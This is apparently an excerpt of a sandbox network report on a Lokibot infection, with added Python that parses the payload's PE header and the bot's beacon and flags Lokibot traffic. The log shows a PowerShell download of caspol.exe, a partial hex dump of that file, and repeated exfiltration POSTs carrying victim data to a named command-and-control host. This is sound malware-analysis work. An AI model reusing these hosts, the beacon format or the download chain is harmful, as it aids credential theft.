                                                                    Nov 20, 2024 07:56:35.880048990 CET1236INData Raw: 68 6c 62 55 61 43 44 63 47 48 44 73 61 55 5a 4f 51 41 6c 63 76 4e 45 57 63 6e 6e 50 6d 49 6e 6e 44 46 54 74 45 4c 6a 4c 62 69 53 63 6e 67 70 59 59 51 58 61 69 46 52 54 70 72 77 56 51 62 4e 59 51 4e 48 72 59 51 72 63 4d 61 73 74 56 77 43 44 69 70
                                                                    Data Ascii: hlbUaCDcGHDsaUZOQAlcvNEWcnnPmInnDFTtELjLbiScngpYYQXaiFRTprwVQbNYQNHrYQrcMastVwCDipvZgZJlDIiINHPspzYRbeiCiZLrRhUfOK%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
                                                                    Nov 20, 2024 07:56:35.880072117 CET1236INData Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35
                                                                    Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252
                                                                    Nov 20, 2024 07:56:35.880084038 CET1236INData Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25
                                                                    Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
                                                                    Nov 20, 2024 07:56:35.880099058 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32
                                                                    Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
                                                                    Nov 20, 2024 07:56:35.880111933 CET1236INData Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35
                                                                    Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252
                                                                    Nov 20, 2024 07:56:35.880125999 CET1236INData Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35
                                                                    Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252
                                                                    Nov 20, 2024 07:56:35.880141020 CET1236INData Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25
                                                                    Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
                                                                    Nov 20, 2024 07:56:35.880153894 CET | 1236 | IN | Data Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32
                                                                    Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
                                                                    Nov 20, 2024 07:56:35.885080099 CET | 1236 | IN | Data Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35
                                                                    Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    2 | 192.168.2.22 | 49167 | 192.3.243.136 | 80 | 3580 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:56:44.852971077 CET | 333 | OUT | GET /55/caspol.exe HTTP/1.1
                                                                    Accept: */*
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: 192.3.243.136
                                                                    Connection: Keep-Alive
                                                                    Nov 20, 2024 07:56:45.447622061 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Date: Wed, 20 Nov 2024 06:56:45 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    Last-Modified: Wed, 20 Nov 2024 01:04:28 GMT
                                                                    ETag: "92a00-6274dbb521496"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 600576
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-msdownload
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 35 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 2e 27 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5=g0 .' @@ `&O@|` H.text4 `.rsrc|@@@.reloc`(@B'H6(^((}{rp o5{o7&*0{o9}&*0to{{rp(o:+%{oo;o&Xi2{o<&{o=*+E\b2{oA*n(}}(*0
                                                                    Nov 20, 2024 07:56:45.447639942 CET | 1236 | IN | Data Raw: 00 be 00 00 00 03 00 00 11 02 7b 07 00 00 04 6f 1a 00 00 0a 17 8d 33 00 00 01 25 16 1f 3b 9d 6f 1b 00 00 0a 0a 02 7b 09 00 00 04 6f 1a 00 00 0a 0b 73 1c 00 00 0a 0c 02 7b 03 00 00 04 06 07 08 6f 03 00 00 06 2c 69 72 35 00 00 70 0d 08 6f 1d 00 00
                                                                    Data Ascii: {o3%;o{os{o,ir5po+(r5p(( -o!r9p(("&{o#{o#+rap("&&(*L$p.0#{
                                                                    Nov 20, 2024 07:56:45.447664976 CET | 1236 | IN | Data Raw: 00 00 0a 02 7b 0b 00 00 04 1e 1d 1e 1d 73 32 00 00 0a 6f 33 00 00 0a 02 7b 0b 00 00 04 72 b9 01 00 70 6f 34 00 00 0a 02 7b 0b 00 00 04 20 c8 00 00 00 1f 37 73 35 00 00 0a 6f 36 00 00 0a 02 7b 0b 00 00 04 1b 6f 37 00 00 0a 02 7b 0b 00 00 04 72 d3
                                                                    Data Ascii: {s2o3{rpo4{ 7s5o6{o7{rpo8{o<{s:o="A"As>(?(@ ] s5(A(B{oC(B{oC(B{oC(B{oC
                                                                    Nov 20, 2024 07:56:45.447680950 CET | 1236 | IN | Data Raw: 00 1f 20 73 35 00 00 0a 6f 36 00 00 0a 02 7b 11 00 00 04 1b 6f 37 00 00 0a 02 7b 11 00 00 04 72 53 03 00 70 6f 38 00 00 0a 20 2b 23 00 00 28 4f 00 00 0a 06 72 65 03 00 70 6f 44 00 00 0a 75 03 00 00 1b 0b 28 50 00 00 0a 72 6f 03 00 70 6f 51 00 00
                                                                    Data Ascii: s5o6{o7{rSpo8 +#(OrepoDu(PropoQiI((8a_X ]X __`aX _EE(X _{a
                                                                    Nov 20, 2024 07:56:45.447695971 CET | 1236 | IN | Data Raw: 16 00 00 04 2d 1e 72 27 04 00 70 d0 06 00 00 02 28 29 00 00 0a 6f 62 00 00 0a 73 63 00 00 0a 80 16 00 00 04 7e 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 6a 28 18 00 00 06 72 67 04 00 70 7e 17 00 00 04 6f 64 00 00 0a 74 26 00 00
                                                                    Data Ascii: -r'p()obsc~*~**j(rgp~odt&*j(rp~odt&*j(rp~odt&*j(rp~odt&*j(rp~odt&*~*(e*Vs!(ft*0{
                                                                    Nov 20, 2024 07:56:45.447706938 CET | 1236 | IN | Data Raw: a7 05 00 70 a2 25 17 72 af 05 00 70 a2 28 31 00 00 06 2d 07 06 73 42 00 00 06 7a 06 2a 4a 02 72 b7 05 00 70 28 33 00 00 06 02 28 34 00 00 06 2a be 02 72 c1 05 00 70 28 33 00 00 06 02 02 28 34 00 00 06 17 8d 31 00 00 01 25 16 72 a7 05 00 70 a2 28
                                                                    Data Ascii: p%rp(1-sBz*Jrp(3(4*rp(3(41%rp(1,}*0Crpsvowox,(oy+(z,*Xi2*0(4(1-sBz*0Z{,Frp
                                                                    Nov 20, 2024 07:56:45.447724104 CET | 1236 | IN | Data Raw: 0c 41 00 01 00 01 00 01 00 10 00 cc 01 96 0c 49 00 03 00 05 00 01 00 10 00 9d 08 96 0c 49 00 0c 00 0d 00 80 01 10 00 0d 07 96 0c 41 00 16 00 16 00 00 00 10 00 3e 0a bf 0a 41 00 16 00 17 00 00 01 10 00 0f 0b bf 0a a5 00 18 00 20 00 01 00 10 00 8c
                                                                    Data Ascii: AIIA>A iA#i5iyBL=PS3W[s_c}_cg$gS1PP[__4cocg
                                                                    Nov 20, 2024 07:56:45.447734118 CET | 1236 | IN | Data Raw: 00 00 00 01 00 92 08 00 00 01 00 3e 02 00 00 02 00 78 01 00 00 01 00 bf 0b 00 00 02 00 d8 01 00 00 03 00 7f 0c 00 00 01 00 c1 0c 00 00 02 00 34 07 00 00 01 00 e0 08 00 00 02 00 54 05 00 00 01 00 e0 08 00 00 02 00 54 05 00 00 01 00 e0 08 00 00 02
                                                                    Data Ascii: >x4TTTTTT49O>x*5s
                                                                    Nov 20, 2024 07:56:45.447747946 CET | 1236 | IN | Data Raw: 00 63 00 95 03 2e 00 6b 00 bf 03 2e 00 73 00 cc 03 49 00 9b 00 5e 03 c3 00 83 00 1b 04 c3 00 8b 00 16 04 c3 00 93 00 16 04 e3 00 93 00 16 04 e3 00 83 00 5d 04 c0 02 7b 00 16 04 27 00 2b 00 49 00 8d 00 0a 01 0f 01 15 01 1b 01 1f 01 b3 01 ce 01 df
                                                                    Data Ascii: c.k.sI^]{'+I~%g+u++++j1 3k:K8
                                                                    Nov 20, 2024 07:56:45.447758913 CET | 1236 | IN | Data Raw: 74 65 00 44 65 62 75 67 67 65 72 4e 6f 6e 55 73 65 72 43 6f 64 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 45 64 69 74 6f 72 42 72 6f 77 73 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69
                                                                    Data Ascii: teDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDes
                                                                    Nov 20, 2024 07:56:45.452725887 CET | 1236 | IN | Data Raw: 00 52 63 70 74 54 6f 00 4d 65 74 68 6f 64 49 6e 66 6f 00 43 75 6c 74 75 72 65 49 6e 66 6f 00 42 69 74 6d 61 70 00 53 77 61 70 00 53 6c 65 65 70 00 68 65 6c 70 00 67 65 74 5f 4a 56 6d 70 00 4e 6f 6f 70 00 73 65 74 5f 54 61 62 53 74 6f 70 00 49 53
                                                                    Data Ascii: RcptToMethodInfoCultureInfoBitmapSwapSleephelpget_JVmpNoopset_TabStopISmtp_smtpGroupStartupClearset_UseSystemPasswordCharInvokeMemberStringBuildersenderBinderget_ResourceManagerComponentResourceManagerFormClosedEventHand
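The response body in session 2 can be checked against its own HTTP headers. The following is an added example and not part of the Joe Sandbox report: it takes the first 160 bytes of the caspol.exe body as transcribed from the Data Raw line above, walks the DOS header to e_lfanew, and reads the COFF file header. The TimeDateStamp 0x673d359c decodes to 2024-11-20 01:04:28 UTC, the same second as the server's Last-Modified header and roughly six hours before this analysis ran (07:56 CET is 06:56 UTC), so the payload was built and staged shortly before the campaign. Machine 0x14c, three sections (.text, .rsrc and .reloc appear in the ASCII dump), the PE32 magic and linker version 48.0 (the value Roslyn's csc writes) are all consistent with a 32-bit .NET assembly, which matches the .NET attribute names visible further down the stream. Field names follow the PE specification; nothing here is taken from the malware's own code.

```python
import struct
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# First 160 bytes of the caspol.exe response body, transcribed from the
# "Data Raw" line of session 2 above (the rest of the 600576-byte body is
# not needed to read the DOS and COFF headers).
CASPOL_HEAD = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"   # DOS header: "MZ" ...
    "b8000000000000004000000000000000"   # ... e_lfarlc = 0x40 ...
    "00000000000000000000000000000000"   # ... reserved words ...
    "00000000000000000000000080000000"   # ... e_lfanew = 0x80 at offset 0x3c
    "0e1fba0e00b409cd21b8014ccd215468"   # DOS stub code + "Th"
    "69732070726f6772616d2063616e6e6f"   # "is program canno"
    "742062652072756e20696e20444f5320"   # "t be run in DOS "
    "6d6f64652e0d0d0a2400000000000000"   # "mode.\r\r\n$" + padding
    "504500004c0103009c353d6700000000"   # "PE\0\0", Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable
    "00000000e00002010b01300000080900"   # NumberOfSymbols, SizeOfOptionalHeader, Characteristics, Magic, Linker 48.0, SizeOfCode
)

# Last-Modified header that came back with the body (session 2 response above).
LAST_MODIFIED = "Wed, 20 Nov 2024 01:04:28 GMT"

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B


def parse_pe_header(data: bytes) -> dict:
    """Read the DOS header, the COFF file header and the first bytes of the
    optional header from the start of a PE image (the dump above suffices)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    (machine, n_sections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    # Optional header starts right after the 20-byte COFF header.
    magic, linker_major, linker_minor = struct.unpack_from("<HBB", data, e_lfanew + 24)
    return {
        "machine": machine,
        "sections": n_sections,
        "timestamp": timestamp,
        "compiled_utc": datetime.fromtimestamp(timestamp, timezone.utc),
        "characteristics": characteristics,
        "pe32": magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC,
        "linker": (linker_major, linker_minor),
        "opt_header_size": opt_size,
    }


def compile_to_last_modified_seconds(data: bytes, last_modified: str) -> int:
    """Seconds from the PE compile timestamp to the server's Last-Modified.
    0 means the file on the server still carries its build time as mtime; a
    negative value would mean the header postdates the upload (timestomping
    or a post-dated build clock)."""
    compiled = parse_pe_header(data)["compiled_utc"]
    served = parsedate_to_datetime(last_modified)
    return int((served - compiled).total_seconds())


if __name__ == "__main__":
    hdr = parse_pe_header(CASPOL_HEAD)
    print(f"machine=0x{hdr['machine']:04x} sections={hdr['sections']} "
          f"compiled={hdr['compiled_utc']:%Y-%m-%d %H:%M:%S} UTC "
          f"pe32={hdr['pe32']} linker={hdr['linker'][0]}.{hdr['linker'][1]}")
    print("compile -> Last-Modified:",
          compile_to_last_modified_seconds(CASPOL_HEAD, LAST_MODIFIED), "s")
```

Comparing the compile timestamp with Last-Modified, and both with the analysis time, is a cheap triage step when a loader fetches a second stage: a zero or small positive gap says the stage was built for this wave, while a gap of years in either direction says the header was tampered with or the file is recycled.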


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    3 | 192.168.2.22 | 49168 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:56:57.243405104 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 176
                                                                    Connection: close
                                                                    Nov 20, 2024 07:56:57.248279095 CET | 176 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: 'ckav.ruAlbus849224ALBUS-PCk0DE4229FCF97F5879F50F8FD3qzHtQ
                                                                    Nov 20, 2024 07:56:57.988333941 CET | 185 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:56:57 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.
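Session 3 is the first Lokibot check-in, and the bytes Joe Sandbox prints are enough to decode its leading fields. The following is an added example, not code from the report or from the malware: it parses the POST body transcribed from the Data Raw line above (the dump stops after about 80 of the 176 bytes, so the parser tolerates a truncated buffer) and checks a raw request for the traffic traits visible in these sessions. The body starts with two 16-bit words (version 0x12, message type 0x27; the later sessions switch to 0x28 with a 149-byte body), then four length-prefixed strings, each introduced by a 16-bit is-Unicode flag and a 32-bit byte length, then two 32-bit values that decode to 1280 and 1024, the sandbox's screen size. Public Lokibot analyses name the four strings binary id, user name, computer name and domain in that order; the report does not label them, so the code returns them as a plain list and treats that mapping as an assumption. The User-Agent Mozilla/4.08 (Charon; Inferno) and the Content-Key header are the well-known Lokibot request fingerprint; note that Content-Key stays A6A8C306 across all the POSTs here although the bodies differ, so its presence is a better match target than its value. The request text is copied from sessions 2 and 3 as constructed input.

```python
import struct

# Check-in body as printed in the "Data Raw" line of session 3 above. The report
# shows only the first bytes of the 176-byte POST body, so the buffer ends
# mid-field and the parser has to cope with that.
BEACON = bytes.fromhex(
    "12002700"                                          # WORD version = 0x12, WORD type = 0x27
    "000007000000" "636b61762e7275"                     # ANSI string, 7 bytes: "ckav.ru"
    "01000a000000" "41006c00620075007300"               # UTF-16LE string, 10 bytes: "Albus"
    "01000c000000" "380034003900320032003400"           # UTF-16LE string, 12 bytes: "849224"
    "010010000000" "41004c004200550053002d0050004300"   # UTF-16LE string, 16 bytes: "ALBUS-PC"
    "00050000" "00040000"                               # DWORD 1280, DWORD 1024 (screen size)
    "01"                                                # first byte of the next field, cut off by the dump
)

# Request lines and headers copied from session 3 (Lokibot) and session 2 (the
# PowerShell download) above; constructed inputs for the header check.
LOKI_POST = """POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 176
Connection: close
"""

PS_GET = """GET /55/caspol.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.3.243.136
Connection: Keep-Alive
"""

LOKIBOT_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"


def read_string(data: bytes, off: int):
    """One Lokibot string: WORD is_unicode, DWORD byte length, then the bytes.
    Returns (text, new_offset), or (None, off) when the buffer is truncated."""
    if off + 6 > len(data):
        return None, off
    is_unicode, length = struct.unpack_from("<HI", data, off)
    raw = data[off + 6:off + 6 + length]
    if len(raw) < length:
        return None, off
    return raw.decode("utf-16-le" if is_unicode else "latin-1"), off + 6 + length


def parse_lokibot_beacon(data: bytes) -> dict:
    """Parse the leading fields of a Lokibot check-in body.

    Order as observed in this capture: version, type, four length-prefixed
    strings, then two DWORDs holding the screen size. Published analyses call
    the strings binary id, user name, computer name and domain (assumption,
    the report does not label them), so they are returned as a list."""
    version, ptype = struct.unpack_from("<HH", data, 0)
    off, strings = 4, []
    for _ in range(4):
        text, off = read_string(data, off)
        if text is None:          # dump ended inside a string
            break
        strings.append(text)
    screen = None
    if len(strings) == 4 and off + 8 <= len(data):
        screen = struct.unpack_from("<II", data, off)
        off += 8
    return {"version": version, "type": ptype, "strings": strings,
            "screen": screen, "trailing": data[off:]}


def lokibot_http_indicators(raw_request: str) -> list:
    """Return the Lokibot traffic traits present in a raw HTTP request
    (request line plus headers, exactly as the report prints them)."""
    lines = raw_request.strip().splitlines()
    request_line, headers = lines[0].split(), {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    hits = []
    if headers.get("user-agent") == LOKIBOT_USER_AGENT:
        hits.append("User-Agent Charon/Inferno")
    if "content-key" in headers:
        hits.append("Content-Key header")
    if (len(request_line) == 3 and request_line[0] == "POST"
            and request_line[2] == "HTTP/1.0"
            and headers.get("content-type") == "application/octet-stream"):
        hits.append("HTTP/1.0 POST of application/octet-stream")
    return hits


if __name__ == "__main__":
    print(parse_lokibot_beacon(BEACON))
    print(lokibot_http_indicators(LOKI_POST))
    print(lokibot_http_indicators(PS_GET))
```

One caveat a responder should take from sessions 3 to 11: the C2 answered every POST with 404 "File not found." (the php-fpm message for a script that is not at that path) and the bot simply retried about once a second. The 404 says nothing about the host being benign, and the first two 176-byte bodies had already carried the harvested data out of the sandbox before any reply came back; block the destination and treat the credentials named in the report as exposed regardless of the response code.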


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    4 | 192.168.2.22 | 49169 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:56:59.157105923 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 176
                                                                    Connection: close
                                                                    Nov 20, 2024 07:56:59.162066936 CET | 176 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: 'ckav.ruAlbus849224ALBUS-PC+0DE4229FCF97F5879F50F8FD3iHQqP
                                                                    Nov 20, 2024 07:56:59.882088900 CET | 185 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:56:59 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    5 | 192.168.2.22 | 49170 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:00.033211946 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:00.038068056 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:00.796703100 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:00 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.2.22 | 49171 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:00.981055975 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:00.985980988 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
